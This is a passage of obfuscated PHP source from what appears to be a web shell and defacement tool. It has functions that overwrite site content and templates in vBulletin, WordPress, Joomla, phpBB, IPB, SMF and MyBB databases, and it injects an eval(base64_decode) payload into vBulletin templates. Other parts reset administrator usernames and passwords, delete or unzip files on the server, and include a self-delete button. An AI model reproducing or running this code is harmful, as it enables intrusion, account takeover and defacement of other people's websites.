{CO\x4c\x4fR:".$iIi1i11l11OoIlIl."; \124E\130\x54-\x44EC\117\x52A\124\111\x4f\x4e: no\x6ee} \x41:\x76i\163\x69\164\145\x64 { \x43\x4f\114\x4f\x52:".$iIi1i11l11OoIlIl."; \124\105\130\124-\x44\105CORAT\x49\117\x4e: n\157\156e} \x41:\141\143\164\151\166\x65 {C\117\114\117\122:".$iIi1i11l11OoIlIl."; TEX\124-DE\103O\x52\101\x54I\117\x4e: \156\x6fne} \x41:\150\157v\x65r {\x63\x6f\154o\x72:b\x6cue;\x54\x45XT-D\105\x43\117\x52\101T\111\x4f\116: \x6e\x6f\x6e\x65} fu\x6e\143\x74ion \x69n\x73(text) { \x64o\x63u\155\x65\156\x74.\x6es\x74.chars.value+=text; \x64o\143ument.\156st.chars.fo\143u\x73(); } \x66\165nct\151\157\x6e Suicide() { \166\x61\x72 co\x6ef\x69\x72m\x53u\x69\x63i\144\x65 = \143\x6f\156\x66\151rm('\101r\x65 Y\157\x75 \x53ur\x65 \x59\x6f\x75 \x57\x61\156\x6ea D\145l\x65\x74\145 \164\x68\145 \x73\1503\154\x6c ?'); i\146(\x63\x6f\156\x66i\x72\x6d\123\165\151c\151\x64\145 == \164\x72\165\145){\144o\143u\155e\x6et.l\157\x63\x61t\x69o\x6e='".i01oiOo00oiIl1Io()."?\151d=\104e\x6ce\x74e';} \145l\x73e{\144o\143\x75men\164.\x6c\157ca\164i\157n='".i01oiOo00oiIl1Io()."';} } fu\156\143\x74\151o\156 \x42l\165\x72(\151\144 , \x64ef\141\154u\x74\x54\145\x78t) { \151f( \x64\x6f\x63\165m\x65\x6et.get\105\154\x65\x6d\145\156\x74B\x79I\144(\x69\x64).value == ''){\144\x6f\143\165ment.\x67e\x74\105l\145m\x65\156\x74\102\x79\x49\144(\x69\x64).value = d\x65f\x61\154\x75\164Tex\164;} } \146\x75\156\143t\151o\x6e Cle\x61\162(i\144 , \x64\145\x66\x61\154u\164\x54e\170\x74) {\151\x66( \144o\143\x75\155ent.\147e\x74\105l\145\155\145n\164\102\x79\x49d(\x69\x64).value == \x64\145falutT\x65x\x74){\144\157\143\x75\x6d\145\x6et.\147\145\x74Elem\145\156\x74By\x49\144(\x69\144).value = '';}} \146\165n\x63\x74i\157\156 \x53\x63\x72\x69p\x74s\124\x79p\x65() { \151f(\144o\143\x75m\x65n\164.\x67\145tE\x6cem\x65\x6e\164\x42\x79\111\144('ScriptType').value == 'v\142') {\144\157\x63\165m\x65\x6e\x74.g\145\164\x45\x6c\145\155\145n\x74\x42yI\x64('\x50\162e\146\151\170').value = '';} e\154\x73\145 if(d\x6fc\165\x6d\x65n\164.\147\145\164\105\154em\x65\156t\x42yI\x64('ScriptType').value == '\x77p') {\144\157c\x75me\156\x74.\147\145t\105l\x65\x6d\145\156\164\102y\x49d('P\162e\x66\151x').value = '\167\160_';} \x65l\163\x65 i\x66(\144o\143um\x65\x6et.\147\145\x74\105l\x65\x6d\145n\164\x42yI\x64('ScriptType').value == '\152\157s') {\x64oc\165\155\145nt.g\x65\164\x45\x6c\145\155en\164\102\171\111d('\x50ref\151x').value = '\152o\x73_';} \145\154\x73e \x69\x66(\144\x6f\x63\165\155\145n\164.\147et\105\154\145\155\145n\x74\102\171\x49\x64('ScriptType').value == '\x70\150\x70\x62\x62') {d\157\x63um\145\x6e\164.\x67e\x74E\x6ce\155\145nt\102y\111\144('\x50\x72e\146\x69x').value = '\160\150\x70\142\x62_';} \145\154\x73e i\146(\144\x6f\143u\x6d\x65\x6et.\147e\164E\x6ce\x6d\x65nt\102yId('ScriptType').value == 'ipb') {do\x63\165\155e\x6e\164.getEle\x6de\156\x74\102y\111d('\x50r\x65\146i\170').value = 'ip\142_';} \145\154s\145 i\146(do\143um\x65\x6e\x74.g\145t\105\154\145\x6d\145\156\x74B\x79\111d('ScriptType').value == 'm\x79b\x62') {\x64\x6f\x63\x75m\145n\164.g\145\x74\105l\145m\145\156\x74\102\x79\111\144('\120\x72\145\146\151\x78').value = '\155\171bb_';} e\154\x73\145 \x69\146(d\x6fc\x75\x6de\x6et.\x67\145\x74\x45\154em\145\156tBy\111\144('ScriptType').value == 'sm\146') {\x64\x6fcu\155\x65\156\x74.\x67\x65\x74El\145m\x65ntBy\x49\x64('\120\162e\x66\x69\170').value = '\163\155\x66_';} } \146\165n\x63ti\x6f\x6e \x65\166\x61\154O\162E\156\x632() { if(d\x6f\x63\165m\x65\156\x74.\x67\x65\x74\x45l\x65\155e\156\164\102\x79\111\144('\145v\x61l\117\162\x45\x6e\143').value == '\145\x76\x61\x6c') {\144\157c\x75\155\145\x6et.\147\145\164\105l\x65\155\x65\x6e\164\x42\171\x49\x64('\x70\x68p_e\x76\141l').value = '';} \x65\154\163e \151\146(\144\x6fc\165\155\x65\156\164.g\x65\x74\105\x6ceme\156t\102\x79\111\x64('e\x76al\x4frE\x6e\143').value == 'enc') {\x64\157c\165\155\145n\x74.\147e\164E\x6ce\155\145\x6e\x74\x42\171\111\x64('\160hp_\x65va\x6c').value = '\x6d\x79 St\162ing \x54o \x45\156cr\x79\160\164';} \x65\x6c\x73\145 i\x66(\x64\x6f\x63\165\155e\x6e\x74.\x67\145\x74\x45l\x65\155\145\x6e\164ByI\x64('\x65\x76alO\x72\x45\x6ec').value == '\x61n\141\154\x79z\x65') {\144\157cu\155\145\156\164.\x67\145\164\105\154\x65men\x74\x42\171\111\144('p\150\160_\x65v\141l').value = '\143\x34c\141\x342\063\070\1410b\x39\062\x33\x38\x32\x30\144\143\x635\x30\071a6\1467\x35\x384\x39\x62';} \x65\154\x73e \x69f(\144\157\143\x75\x6de\156\164.\x67\x65\164\105\x6c\x65m\145n\164\x42\171\111\x64('e\166\141\154Or\x45\x6e\143').value == 'sc\x61\x6e') {d\157\x63\x75m\x65\x6e\x74.\x67\x65\x74El\x65m\x65\156t\x42y\x49d('\x70\150p_\145\x76a\x6c').value = '127.0.0.1';} el\163\145 \151\x66(\144o\143\x75\x6d\145\156\x74.g\145\164El\x65\155\x65nt\102y\x49\144('\x65\x76\141\x6c\117\162\x45\156\143').value == '\x67\145\x6eS\145\x72\166') {d\157cu\x6dent.\147\145t\x45\154\145m\145\156\x74\102\x79I\144('\x70h\x70_\x65v\x61\154').value = '".addslashes(getcwd())."';} \145l\163e \151\x66(\x64\157\143\165me\156t.\x67\145\x74\x45l\145\x6de\x6e\164\x42\171\111\144('e\x76al\117\x72\105\x6ec').value == '\163q\x6cS\x63\141\x6en\145\x72') {\144\157cu\x6de\x6e\164.\x67e\x74\x45\154\145\x6d\145\156\164B\x79I\x64('p\150\160_ev\x61\x6c').value = 'i\156\x75\x72\154:ph\x70?=i\x64+site';} } f\165\156\143\164\x69\157\x6e \103h\141\x6e\147\x65\x53\x51\x4c\124\x79\x70\145() { \x69\x66(\x64\157c\x75\155e\156\x74.\x67\145t\105l\145m\145\156\x74\x42y\x49\144('\x53Q\x4c\124y\160\145').value == 'S\x51\x4c\121\165e\x72\x79') {\144\157\x63\165\155\x65\x6e\x74.\x67\145\x74\105\154e\155e\156\164\x42\171\111\144('inpu\x74T\171\160e').in\156\145\162\110T\x4dL = '<\x74\x65\170\x74\x61\x72\x65\x61 name=\'\x51\125\' rows=\'4\' \x63ols=\'44\'>\x53\105\114EC\x54 * FROM e\x6d\160 ;';} \x65l\x73\x65 i\146 (\144oc\165\x6d\x65\x6e\x74.\x67\x65tEl\145\x6d\x65\156\164B\171Id('\123QL\124\x79pe').value == '\123\121\114R\145a\x64\x65\x72') {\144\157\143u\155\x65\156t.\x67etE\x6c\145m\x65\156\x74\x42\171Id('\151\x6e\160\165\164T\171\x70\145').\x69\156\156\x65\162H\x54\115L = '<\x62\162/>';} \145l\163\x65 \151\146 (docu\x6den\x74.\147\145t\105l\x65\155\145\x6etB\x79\111d('\x53Q\114\124\x79\x70\x65').value == '\105\155\x61\151l\x45\170\164\x72a\143\164or') {\x64\157\x63um\145\x6e\164.\x67\145\164El\x65\x6d\x65\156tB\171\111d('\151\156\160\x75tTy\x70\145').\151n\x6e\145\x72\110\124\115\x4c = ' <\142\162/>';} } \146\165\x6ectio\156 v\x69\x65\167\x50a\163\163() { \151\x66(\x64\x6f\143\165m\145\156\x74.get\105\154e\155\145nt\102\171\111\x64('b\x61c\x6b_se\154ect').value == 'p\145\162\x6c\062') {\144\x6fc\165m\x65n\x74.g\145\x74\105\x6c\x65\x6d\145\156\x74\102\x79\111d('\x76\151e\x77_\x70\x61\163\x73').i\x6e\x6e\x65\162HT\x4d\x4c= '';} \x65\154\x73\145 {d\x6f\x63\165\155\145\156t.\x67\145t\x45\154\x65\155\145\x6e\x74B\171\x49\144('\166\x69\x65\x77_\x70a\x73s').\x69n\x6e\145\x72H\x54\115\x4c= '';} \x69\x66(\x64\x6f\x63\165me\156\x74.\147\145\x74El\145\155\x65\x6etB\171\x49d('b\x69\156\144_\x73\x65\x6c\x65\x63t').value == '\x70\x65r\154\061-l\x69n\165\170') {\x64\157\x63\x75\x6d\x65\156\164.\147\145\x74E\x6ceme\156\164\x42\x79\111\x64('\x76i\145\167_\142\151n\x64_\160\141\163\x73').i\x6en\145\x72H\124\x4d\x4c= '';} els\x65 {\x64\x6f\x63\165me\x6e\164.\x67\x65\x74\105lem\x65\x6et\102\x79\111\144('v\x69\x65\x77_b\x69n\x64_\x70\141\163\x73').\151n\156erH\124ML= '';} if(\144\157\143\x75\x6d\x65\x6et.\147\x65\164\x45\154\145\155e\x6e\164\x42\x79\111\144('\142\x69\x6ed_s\x65\x6c\145c\x74').value == '\143\x31-li\156\165\170') {\x64\x6f\143ume\156\164.\x67\145\x74E\154\x65\x6de\156\x74\102\171I\x64('v\x69e\x77_\142\x69n\144_\160as\163').i\156n\x65rH\124ML= '';} \x65l\163\145 {do\143u\155\145\x6e\164.g\x65\164\105l\145\x6de\156\164\102y\111\144('\166\x69\x65\167_\x62i\156\x64_\x70\141ss').\x69\156\x6e\x65\162\x48\x54M\114= '';} } fu\x6e\143\x74\151\x6f\156 \x61d\144\x55pl\x6f\x61\144\111\x6e\160u\164() {do\143\x75m\145\x6e\x74.\x67\x65\x74\x45\x6ceme\x6e\x74B\171\111d('u\160l\x6f\141d\111\156\x70u\x74').i\x6e\x6ee\162H\x54M\x4c += ''; } \x66\165nc\164ion \x68\141c\153\151\156gT\x79\x70e\x73() { i\x66(\144\157\x63u\x6de\x6et.\x67\x65\x74\105\x6c\145\x6d\x65\x6e\x74By\x49d('hackingType').value == 'i\x6e\144e\170\103\x68\141ng\x65r') { \144o\143\165\155\145n\164.\x67\x65\164\105\154\x65\x6de\156t\x42\171\111\x64('\x49\156\x6a\x65\143\x74\x53\150\145\x6c\x6cSpa\156').\x69n\x6eerHTM\114 = '<\x73\171>\x49\x6e\x6a\145\x63\164 \x53\x68\x33\154\x6c ? <\x73\x65\154e\143\x74 name=\'\x69nj\x65\143\x74S\150\x65ll\' i\144=\'\151nj\145\143t\123hel\154\' \157\x6ec\150\x61\x6ege=\'inj\x65\143t\123\150\x65l\x6c\x46u\x6ec\x74\151o\156();\'><\163\x79> V\102\165\154\x6ce\164\151n On\154\x79 ! '; \144oc\165m\x65\156t.\147\x65\x74\x45\x6c\145m\x65ntB\x79I\144('\x53\110\x42').inn\145\162\x48\124\115\114 = '<\164\145\x78\x74are\141 name=\'\111NDEX\' rows=\'9\' \151d=\'\x74\150e\x49\x6e\x64\145x\' \143\x6f\154\x73=\'45\' onbl\x75\x72=\'Blu\162(\"\164h\145\x49\156\x64\145x\",\"Pu\164 \x59\x6f\165r Index \110e\x72e !\");\' \x6fn\x63\x6c\x69\143k=\'\103\x6c\145\x61\x72(\"\x74\150eIn\144ex\",\"\120\165\x74 \131\157\165\x72 \111n\144e\170 \110\145\x72\x65 !\");\' >\x50\x75\x74 \131\x6f\x75\x72 \x49nd\x65\170 H\x65r\x65 !'; } e\x6c\163\145 \151\x66(\144\157\143\165\x6de\156\164.\x67\145\x74\x45\154\145m\x65\x6e\x74\x42y\x49d('hackingType').value == 'changeInfo') { do\143\x75\x6d\x65\x6e\164.\x67\145t\105\x6c\x65\155\145\x6e\164\102\171I\144('\x49n\152e\x63tSh\x65\x6c\154\124yp\145\123\x70\141\x6e').\x69n\x6eer\110\x54M\x4c = ''; \x64\157c\x75m\145\x6e\164.\147\x65\164E\154\x65\x6d\x65\x6e\164B\171\x49\x64('\x49\x6e\152\145c\164\123\x68e\154l\123\x70\141n').\x69nner\110T\115L = ''; \x64\157\143u\155\145\156\164.g\x65t\105l\x65\x6d\145\x6e\x74B\171\111\x64('\x53\x48B').in\x6e\x65\162HT\115L = ''; } \x65l\163\145 \151\x66(\144\157\143um\145\156\164.g\x65\164\x45\154\145\x6d\145\156\164ById('hackingType').value == '\144\x65\143\162\x79p\164') { d\157\143\165me\x6et.g\x65\164\x45l\x65\155e\x6e\164\x42\171I\x64('\x49\x6e\x6a\x65\x63\x74\x53\150e\x6c\x6cT\x79\x70\145\123\x70an').in\x6e\145\x72\110\x54M\x4c = ''; \144\157c\165m\145\x6e\x74.\x67e\164\105\x6ce\155\145\156\164B\x79\x49d('I\x6e\152\x65c\x74She\x6c\x6c\x53p\141n').i\x6e\156e\162\110\x54M\114 = ''; \144\x6f\x63u\155\145\156t.\x67\145\164E\x6c\x65\155en\x74\x42y\x49d('SH\x42').in\x6e\145\162\110\x54\115\x4c = ''; } } \x66\165nc\164i\157n in\152e\x63\x74\x53\150\x65\154l\x46un\x63t\x69\x6f\156() { \151f(\144\157\143ume\x6e\164.\147\x65t\105\154\x65\x6d\145\156\x74By\x49d('\x69\x6ejec\164\123h\145ll').value == '\x79\145\x73') { \144\x6fc\x75\x6d\x65\156\x74.\x67\x65t\105l\145\x6d\x65\156tById('\x49nje\x63\x74\123\x68\x65\x6c\x6c\x54y\x70e\x53\160\141\156').\151\156\156er\x48\124ML = '<\x73\x65le\x63t name=\'injectShellType\'>'; } \x65\154s\x65 {\144o\x63\165me\x6et.\147\x65tE\154\145\x6d\145\156\164\x42\171I\x64('\111\156\152\x65\143t\x53\150\x65l\x6c\124\x79\160e\123\160\141n').\151\x6e\156e\162\110\x54M\114 = '';} } \x66un\143\164\x69\x6f\156 \103\150\141n\x67e\111\x6ep\x75\x74\x73() { \151\146(d\157\x63\165me\x6e\x74.\147e\164\x45l\x65m\x65\x6e\164By\111\144('\141\143\x74\x69\x6f\x6eT\x79p\x65').value == '\162\x65\x6e\x61\x6de') {\144o\x63\x75m\x65\156t.\147\145tE\154em\145\x6e\164B\171\111d('\156\145\x77N\141\x6de').\151\x6e\156er\110TM\114 = ' '; } \x65\154\x73\x65 if (\144\x6f\143\165\x6de\x6e\164.get\x45\154\x65m\145n\x74\102\x79\111d('\141\x63\164\151\x6f\x6e\124\x79p\x65').value == '\x63o\x70y') {d\x6f\x63\x75me\x6e\x74.\x67\x65\164El\x65m\145\x6e\164\102\171Id('n\145\x77N\x61me').\151nn\x65r\x48\x54\115\114 = ' '; } \145\x6c\163e \151f (d\157\143u\155\145n\164.\147e\x74E\154e\155\x65\156\164\x42y\111d('\x61c\x74\x69o\x6eT\x79\160e').value == '\x63\x72\x65\x61te\x46\x69\154\x65') {d\x6fc\x75\x6d\x65\156\164.\147\x65\x74El\145\x6de\x6e\164B\171\x49\x64('\x6eew\116\x61m\145').i\x6e\156\145rHT\115\x4c = ' '; } \145\x6cs\x65{\144\157c\165\155\x65n\x74.g\x65\164\105le\155\x65\156\x74\x42\171I\144('\x6ee\167N\141\155\x65').\x69\156n\145\162\x48\x54\x4d\x4c = '';} \151\146(do\x63um\x65\x6e\x74.\147\145\164E\x6ce\155e\x6e\164\102\x79\111\x64('\x61\143\164io\156\x54\x79\160\x65').value == 'deleteFolder' || d\157c\x75\155\x65\x6e\x74.\x67etE\x6c\x65m\x65n\164\102yId('\x61c\x74\151\157\156\x54ype').value == '\x63r\x65ateF\157\154d\145\x72') {do\143u\155e\156t.get\105\x6c\145\155entB\171Id('\145\144\151\164\x46\151\x6c\145').value = 'folderName';} \x65\154\x73\145{d\157\143\x75\155\x65nt.g\x65\x74\x45l\x65\155\145\x6e\164\x42\171I\x64('e\x64\x69\164\106\x69\154e').value = 'index.t\170t';} } "; if($_GET['id'] == '' && $_GET['info'] == ''){$css .= "\167i\x6e\x64\x6fw.l\157\x63a\x74i\157\156 = '?\x69\x64=\x6da\x69n\120\141\147e';";} return $css; } function Logout() { print "<\163\143\x72i\160t> d\x6f\x63\x75\x6de\x6et.\x63\x6f\x6f\153\x69\x65='user='; \x64\x6f\143\165\x6de\156\164.c\x6f\157\x6b\x69e='pass='; \x76\x61\162 url = \x77\151\156\144\x6f\167.\x6coc\x61\164i\157\156.p\x61\x74\x68\x6e\x61\155\145; \166\141r filename = url.\163u\142\163\x74r\151\x6e\x67(url.la\x73t\x49nd\145x\117f('/')+1); \167\x69\156d\157w.l\x6f\143\x61\x74i\157\156=filename; "; } function About() { $about = " <\x74r> <\144\x69\x76 \141\x6cig\156=ce\x6et\x65\x72><\x62\x72> <\x73y><\x64\x69\166 \141l\151\147n=\x63ent\x65\x72>C\157\x64\145\144 \x42\x79 : EH << \x53yR\x69\x41\156 | 34\107\061\x33 <\163\171><\x64iv al\151\147n=c\145n\x74\145\x72>\106\x72o\155 : S\x79\122i\101n \101r\x61b\x69\x63 \x52e\160\x75\x62lic <\x64i\166 a\x6c\x69\147n=\143e\156t\x65r>\101g\145 : 4/1991 <\163\171>\124h\x61n\170 : [ \x41\154la\x68 ] [ \x48\x61\156\x69WT ] [ Sy\x52\151A\x6e_S\x6e\x49p\105r ] [ Sy\x52\151\x41\156_\123\160I\144E\x72 ] [ \x54N\124 H\141ck\x65\x72 ] <\163y>\x54\150an\170 : \155y \163\143\x68\x6f\x6f\154 : [ \167w\167.google.\143o\155 ] :) <\142r><\144i\166 alig\156=c\x65\156\x74er>B\x33 \x43\162\0634T!V\063 0R \x44!3 \x54Ry!n\x47 <\142\162/> <\x66or\155 method='\x70\x6f\163\x74' a\143\x74i\x6f\x6e=''>"; $ipi = getenv("\122\105MO\x54\105_A\104\104\122"); $httprefi = getenv ("H\124\124\x50_\x52\x45F\105\x52E\122"); $httpagenti = getenv ("H\x54\124\x50_U\123\105\x52_\101\x47\105\116\x54"); $about .= '



'; return $about; } function i1iOiooI011Ioo0o($url) { $i0o1iOil1oIoI0I1 = curl_init(); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_FOLLOW, 0); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_HEADER, 1); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_URL, $url); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_TIMEOUT, 30); $data = curl_exec($i0o1iOil1oIoI0I1); if($data) {return $data;} else {return 0;} } function iilO1iIi11i10io0($text) {return htmlspecialchars($text, ENT_QUOTES);} function ii10i1O10IIIOi11($scriptType,$index,$prefix,$injectShellType) { if ($scriptType == 'vb') { $i00llooOi1l0iIio = "{\${e\166a\154(\x62a\x73\145\x36\x34_\144\x65\x63ode(\'"; $i00llooOi1l0iIio .= base64_encode("e\143\x68\x6f \"$index\";"); $i00llooOi1l0iIio .= "\'))}}{\${e\x78\x69\164()}}"; if($injectShellType == 'faq') { $shell = mysql_query("U\x50DA\124\x45 \164e\155\160\154\x61\x74\145 SE\x54 t\145mp\x6c\141te ='".$i00llooOi1l0iIio."' \x57H\105\x52\x45 \x74\151\x74\154\145 ='\146a\161'"); } else if($injectShellType == 'calendar') { $shell = mysql_query("U\120\x44A\124\x45 t\145\155\x70\154\141t\145 \x53\105\124 \164\145\x6d\x70la\164\x65 ='".$i00llooOi1l0iIio."' WH\x45\122\x45 \164\x69\x74\154\x65 ='\143\141l\x65n\x64\x61r'"); } else if($injectShellType == 'search') { $shell = mysql_query("U\120\x44\x41TE \x74\x65mp\154\x61\164\x65 \x53\105T t\145\155\160la\164\x65 ='".$i00llooOi1l0iIio."' \127\110\x45\122\105 \164\x69\x74\154\145 ='\163e\141\x72\143\x68'"); } else { $ioO0l1OOl11iIl0I = mysql_query("U\x50\x44A\124E t\145mp\x6cat\x65 S\105T \164\x65mp\x6c\x61\x74e ='".$i00llooOi1l0iIio."' W\110E\122\105 \x74\151\164\154e ='f\157\162\165m\x68\x6fm\x65'"); if (!$ioO0l1OOl11iIl0I) {$iII0llOi0oO0IO0I = mysql_query("U\120D\x41\124E \x74\145\x6d\x70\154\x61t\x65 \x53\x45T t\x65\x6dp\x6ca\x74e ='".$i00llooOi1l0iIio."' \127\110\105\x52\x45 \164\x69\164l\145 ='\x68\x65\x61\144\145\x72'");} elseif (!$iII0llOi0oO0IO0I) {$ilo11l0100o1Iii1 = mysql_query("\x55PD\x41T\105 te\x6dpl\x61\x74\145 \123\105\124 te\155\160l\141t\145 ='".$i00llooOi1l0iIio."' \x57H\x45\x52\x45 \x74\x69\x74\x6c\145 ='\163\160a\x63\x65r_\x6fpen'"); } } mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I || $ilo11l0100o1Iii1 || $shell){update();} else {echo "\x55p\144\141tin\x67 \x48\141\163 \x46\141i\x6ced !";} } else if ($scriptType == 'wp') { $i011l0ooOOl1oIo0 = $prefix."\160\x6f\163ts" ; $ioO0l1OOl11iIl0I = mysql_query("UP\104A\124E $i011l0ooOOl1oIo0 S\x45\124 p\x6f\x73\x74_\x74it\154\145 ='".$index."' W\x48E\122\105 \111D > 0 "); if(!$ioO0l1OOl11iIl0I) {$iII0llOi0oO0IO0I = mysql_query("\x55\x50D\x41T\105 $i011l0ooOOl1oIo0 \x53E\124 \160o\x73\164_c\157\156\x74\x65\x6et ='".$index."' W\x48\105RE \x49\104 > 0 "); } elseif(!$iII0llOi0oO0IO0I) {$ilo11l0100o1Iii1 = mysql_query("\125PD\x41TE $i011l0ooOOl1oIo0 \123ET \160\157\163\164_nam\x65 ='".$index."' \x57HE\x52\x45 \111D > 0 "); } mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I || $ilo11l0100o1Iii1){update();} else {echo "\x55p\x64a\164\151\x6e\x67 Ha\163 F\141\x69le\x64 !";} } else if ($scriptType == 'jos') { $iO01iO10i1O1I001 = $prefix."m\145\156u" ; $ill1i0iO1lloI1O1 = $prefix."\155o\144u\x6c\x65\x73" ; $ioO0l1OOl11iIl0I = mysql_query("\x55\120\104AT\105 $iO01iO10i1O1I001 S\x45T name ='".$index."' \x57\x48\x45\122E I\x44 > 0 "); if(!$ioO0l1OOl11iIl0I) {$iII0llOi0oO0IO0I = mysql_query("U\x50D\x41\124E $ill1i0iO1lloI1O1 \x53E\x54 \164\x69tl\x65 ='".$index."' \127H\105RE ID > 0 ");} mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I || $ilo11l0100o1Iii1){update();} else {echo "U\160\144\x61\164i\x6eg H\141\x73 \106a\x69l\145\144 !";} } else if ($scriptType == 'phpbb') { $il1oliO1lO1iI00o = $prefix."\146\157r\165\x6d\163"; $il00i1Oli10oIi11 = $prefix."\160\x6f\x73\x74\163"; $ioO0l1OOl11iIl0I = mysql_query("\125\x50\104\x41T\105 $il1oliO1lO1iI00o \123\105\x54 \x66or\x75\x6d_n\141m\x65 ='".$index."' \x57\x48\105\122E \x66\157\x72\165\x6d_\151d > 0 "); if(!$ioO0l1OOl11iIl0I) {$iII0llOi0oO0IO0I = mysql_query("\125PD\101T\105 $il00i1Oli10oIi11 \x53\105\x54 \160o\x73\x74_\x73\165\142je\x63\164 ='".$index."' W\x48\x45\x52\x45 \160o\x73t_\x69d > 0 "); } mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I || $ilo11l0100o1Iii1){update();} else {echo "Up\x64\141t\x69\156\147 H\x61\163 \106\x61\151\154e\144 !";} } else if ($scriptType == 'ipb') { $ioO1l0l0l0olIOOl = $prefix."c\157\155\160o\156\145\156t\x73" ; $ioIlloloiOioIO1l = $prefix."f\157ru\155s" ; $iI11101olOiiIoO0 = $prefix."\x70\x6fs\x74\x73" ; $ioO0l1OOl11iIl0I = mysql_query("\125\120\x44\x41\x54\x45 $ioO1l0l0l0olIOOl \123\105\124 c\157m_\x74\151\x74l\x65 ='".$index."' W\x48\x45R\105 \143o\155_i\x64 > 0"); if(!$ioO0l1OOl11iIl0I) {$iII0llOi0oO0IO0I = mysql_query("UP\x44A\124\x45 $ioIlloloiOioIO1l S\x45T name ='".$index."' \x57\110\105\x52\x45 id > 0"); } if(!$iII0llOi0oO0IO0I) { $ilo11l0100o1Iii1 = mysql_query("\125P\x44A\x54\x45 $iI11101olOiiIoO0 \123E\124 \160\157\163\x74 ='".$index."' \127\x48E\122E pid <10") or die("C\141\x6e't \125\x70\144\141\164\x65 Tem\x70l\141\164\x65s !!"); } mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I || $ilo11l0100o1Iii1){update();} else {echo "Upd\141t\x69\x6eg \110as \106a\151led !";} } else if ($scriptType == 'smf') { $iliiiOoo0oi1iI0I = $prefix."b\157\x61\x72\x64\x73" ; {$ioO0l1OOl11iIl0I = mysql_query("\125PDA\x54\x45 $iliiiOoo0oi1iI0I S\105\124 \144e\163\x63\x72i\160t\x69\157\x6e ='".$index."' \127\110E\x52E \111\104_B\117\101\x52\x44 > 0");} if(!$ioO0l1OOl11iIl0I){$iII0llOi0oO0IO0I = mysql_query("\x55PDAT\x45 $iliiiOoo0oi1iI0I \x53\x45\124 name ='".$index."' W\x48\x45\x52\105 I\104_\x42\x4f\x41RD > 0");} mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I){update();} else {echo "\x55\160da\164\x69\156\x67 \110\x61\x73 Fa\x69\154e\x64 !";} } else if ($scriptType == 'mybb') { $ioi1iio0o1o1I11o = $prefix."te\155\160\x6cates"; $ii1OlloO1iiOIio0 = mysql_query(" update $ioi1iio0o1o1I11o \163et t\x65\155\x70\x6cate='".$index."' \x77\150\x65\162\145 tit\154\x65='index' "); if ($ii1OlloO1iiOIio0){update();} else {echo "\x55\x70d\x61\164\151\x6eg Has F\141\151le\x64 !";} mysql_close(); } } function i01IiIiilloIOIOO() { iioO1iiiOOoIi1l0($ScriptType); iIO0io1IO0OI1lii($host,$user,$pass,$dbName); ii10i1O10IIIOi11($ScriptType,$index,$prefix,$i0lIioiO0ioiIo1i); } function changeInfo($ScriptType,$adminID,$userName,$password) { if($ScriptType == 'vb') { $password = md5($password); $iOIl1o000llilI11 = mysql_query("\x55\x50D\x41TE user \x53\x45\x54 username = '".$userName."' , password = '".$password."' W\x48\x45\x52\x45 use\162\151d = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {echo "\x45\162\x72or !!";} } else if($ScriptType == 'wp') { $password = crypt($password); $iOIl1o000llilI11 = mysql_query("\x55PD\101\124\x45 \x77p_\x75\x73\x65\162\x73 \x53E\x54 \165\163\x65\162_\x6c\157\147in = '".$userName."' , u\163\145r_\160\141\x73s = '".$password."' \x57\x48\105\122E \111\104 = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } else if($ScriptType == 'jos') { $password = crypt($password); $iOIl1o000llilI11 = mysql_query("\x55\x50\x44\x41\124\105 j\157s_\165\163ers \x53\105\x54 username ='".$userName."' , password = '".$password."' \127\110\x45\x52E I\x44 = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } else if($ScriptType == 'phpbb') { $password = md5($password); $iOIl1o000llilI11 = mysql_query("\125\120\104\x41\124E p\x68\x70\x62b_us\145\x72\x73 \x53\x45\x54 username ='".$userName."' , \165\163er_\160\141\x73\163\167\157\162\144 = '".$password."' \x57\110\105R\105 user_id = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } else if($ScriptType == 'ibf') { $password = md5($password); $iOIl1o000llilI11 = mysql_query("U\120\104\x41\x54\x45 \x69\x62\x66_\155\x65m\x62\x65\x72\163 S\x45T name ='".$userName."' , \x6d\145\x6db\145\x72_l\x6fg\x69\156_\x6bey = '".$password."' \x57HE\122\x45 \x69\144 = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } else if($ScriptType == 'smf') { $password = md5($password); $iOIl1o000llilI11 = mysql_query("\125PDATE \x73\x6d\x66_\155\x65m\x62\x65r\163 \123\105T me\155b\145\162N\x61m\x65 ='".$userName."' , passwd = '".$password."' W\110\x45\x52\105 I\104_\115E\115B\x45R = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } else if($ScriptType == 'mybb') { $password = md5($password); $iOIl1o000llilI11 = mysql_query("U\120\x44\x41\124\x45 \155\171b\x62_\x75\x73\145\162\163 S\x45\124 username ='".$userName."' , password = '".$password."' \127\110ER\105 uid = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } } function UnZip($fileName,$currentPath) { if(class_exists('ZipArchive')) { $zip = new ZipArchive; $i0IoililO0ooIl01 = $zip->open($fileName); if ($i0IoililO0ooIl01 === TRUE) {$zip->i101i1O1O01Il0Il($currentPath);$zip->close();} } else{$iOo0li0ioo0IoOo0 = 'unzip '.$fileName;Exe($iOo0li0ioo0IoOo0);} } function iOIoi1lOOI00I10I($fileName,$path) { $path = $path."\\".$fileName; $zip = new ZipArchive; if ($zip->open($fileName) === TRUE) { $zip->iIIiilillIoOOI0l($path,$fileName); $zip->iIIiilillIoOOI0l($path,$fileName); $zip->close(); } } function DeleteFile($fileName) { global $os; $iiiIi01o0O0IIIOi = unlink($fileName); if(!$iiiIi01o0O0IIIOi) { if($os == "Windows") { $iiI0io0lillIi1ol = "d\x65\x6c ".$fileName; 